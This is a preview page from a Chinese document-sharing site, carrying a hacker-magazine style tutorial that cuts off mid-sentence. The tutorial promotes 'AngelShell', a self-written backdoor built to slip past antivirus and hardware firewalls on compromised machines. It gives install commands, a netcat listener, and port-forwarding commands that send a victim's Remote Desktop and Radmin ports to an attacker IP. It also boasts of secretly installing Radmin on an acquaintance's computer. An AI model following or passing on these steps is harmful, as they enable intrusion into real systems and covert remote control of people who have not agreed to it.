让所有正向程序实现反向连接.doc_第1页
让所有正向程序实现反向连接.doc_第2页
让所有正向程序实现反向连接.doc_第3页
让所有正向程序实现反向连接.doc_第4页
免费预览已结束,剩余1页可下载查看

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

让所有正向程序实现反向连接(应用篇)适合读者:入侵爱好者、黑客工具爱好者前置知识:3389终端使用方法、Radmin使用方法蝴蝶:硬件防火墙是入侵和控制肉鸡的噩梦,而能饶过防火墙的反向连接后门又有诸多不便,常长莫名其妙地罢工这样的日子即将过去!我们这次用的后门,不仅要让它自己能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、Radmin、MSSQL等!吃惊?不用的,只是你没想到、别人没写出来程序而已!AngelShell:让所有正向程序实现反向连接(应用篇) 现在的服务器几乎全是放在硬件防火墙后的,好不容易渗透进去,结果却发现装有硬件防火墙,扫兴啊!什么终端服务、什么Radmin之类的控方式想都不要想。试了试,发现几乎都支持反向连接,正向连接只能连接80和21端口,连1433都连不上。那就传个反向的后门上去吧,一传上去就被杀毒软件Kill了。一气之下,搬出Delphi,自己动手写后门!花了几天的时间,后门终于写好了,也达到了理想中的要求,使用效果非常不错,足以称为硬件防火墙和内网肉鸡的噩梦了!不敢独享,赶紧拿出来给大家共同分享一下。 这个程序叫AngelShell,这里用我的肉鸡和自己使用的计算机做测试。首先需要在本地配置一个记载反向连接信息的文件,第一行是自己的IP,第二行是用NC监听的端口。写好后把它放到HTTP空间上,然后进行配置:配置好密码和你刚才上传到FTP空间里的HTTP访问地址,如图1所示。图1 你可以选择生成DLL的服务端或者EXE的服务端,其中EXE的服务端直接运行即可安装,而DLL的服务端则需要用如下命令安装:“rundll32 dll路径,I”,记得最后一个I一定要大写。小提示:程序作者其实是为了方便大家才提供的EXE服务端,其本质也是安装DLL程序,只不过是用程序来解包并自动实现安装。这里我以DLL服务端来示范。先把DLL传到心爱的肉鸡上面,然后在命令行上面打入:“rundll32 angel.dll,I”。注意这里我是通过FTP连接上肉鸡的,为了方便就直接用FTP的命令行安装了,如图2所示。图2 装好以后,在自己的机器上用:“nc v l p 7787”监听7787端口,也就是我最开始写的配置文件里的端口。过了一会NC就提示有信息传输,输入密码敲回车,OK,连接成功。帮助信息显示后,可爱的Shell出来了。如图3所示。图3小提示:这个后门还提供了一些附加命令,可以直接在Shell中执行。作者为了避免与已有的程序名冲突,所以附加命令全部为小写。讲到这里,大家也许会觉得偶这款后门除了可以生成EXE服务端以外,也没什么特别的。当然,就这些功能当然不够打造出我的特色,也不能算是硬件防火墙的噩梦。我们这次用的后门,不仅是要让它自己能够实现反向连接,而且要让其它所有的能正向连接的程序都实现反向连接,比如终端服务、Radmin、MSSQL等等!呵呵,不要吃惊,好戏正在后头呢,偶不会让大家失望的,Lets GO!看到Shell里的Fport附加命令没有?也就是端口转发,它可以把远程计算机的任意端口反向模拟到本地来。什么?你没懂?呵呵,没关系,往下看就知道了。我们先来测试一下Windows的终端服务。这台肉鸡以前就被我开过终端服务了,但一直苦于硬件防火墙的拦截而无法连接,今天要好好爽一下!小知识:Fport的用法:fport 其中参数local port是指你在肉鸡上要转发的端口,Your IP 是你的IP(或域名,YourPort是指你的客户端上监听的端口。打开客户端,在“要模拟的端口”上面填3389,在“连接远程计算机的端口”上任意填,当然不要与已开的端口冲突,这里我填7788,然后点“开始监听”。赶紧到肉鸡的Shell下面敲入:“fport 3389 61.187.*.* 7788”。其中3389是肉鸡的终端服务的端口,7788是我们这边这个连接远程计算机的端口。然后客户端上马上提示已接收到远程计算机的连接,提示此时已经可以连接本地的3389端口了。这样我们就把肉鸡上的3389端口搬到自己的爱机上来了,如图4所示。 图4 朋友们,我们还等什么呢?打开终端服务登录器,IP填上本地的,连接,客户端马上显示已经成功建立了一个新的连接,并出现了远程桌面登录的对话框,我心里那个激动啊,真是语言无法表达!我们再试试登录两个用户,客户端又显示成功建立了一个新的连接。事实证明,同时登录2个用户也成功了!当然,如果你愿意的话可以登录更多的用户,我编程的时候设置的每个连接都通过2个线程来进行数据传输,所以在传输速度方面是有保障的。如图5所示。图5 沉浸在喜悦中时,电话响了,原来是一位MM买了摄像头,叫我去帮她装,这也要去?于是叫她上QQ,正好给偶再测试一次。这位MM虽然没有硬件级的防火墙,但是她在内网,用的是Windows XP专业版。我先把EXE的服务端传给她,叫她运行,然后在本地进行监听,过一会就提示收到信息并需要输入密码。输入密码后得到了一个Shell,再用文件下载功能给她安装一个Radmin,够阴险吧!然后敲入如下命令:“fport 4899 61.187.*.* 7788”,将她的4899端口转发到我的4899端口来,然后在本地打开Radmin Viewer,连接IP写,端口就用默认的4899,成功连接!如图6所示。图6帮她打开设备管理器,三下五除二装好了摄相头驱动程序,MM还楞在那不知道怎么回事,哈哈,等她反应过来后那个崇拜啊!非吵着要拜我为师,汗测试到这里也就结束了,心里的痛快就别提了,呵呵!该程序理论上是支持任何协议的,但是由于某些协议的特殊性,它会对IP进行验证,所以可能会达不到我们想要的效果。比如WEB服务,今天本来把肉鸡上的80端口转过来了,想骗骗别人说自己开了个网站。结果一连上来却显示什么:“No webin this ”,大概意思就是这个地址没有WEB服务,这才想起HTTP协议中还有个Host的值不符合,难怪。 最后说一下关于在内网中使用本程

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论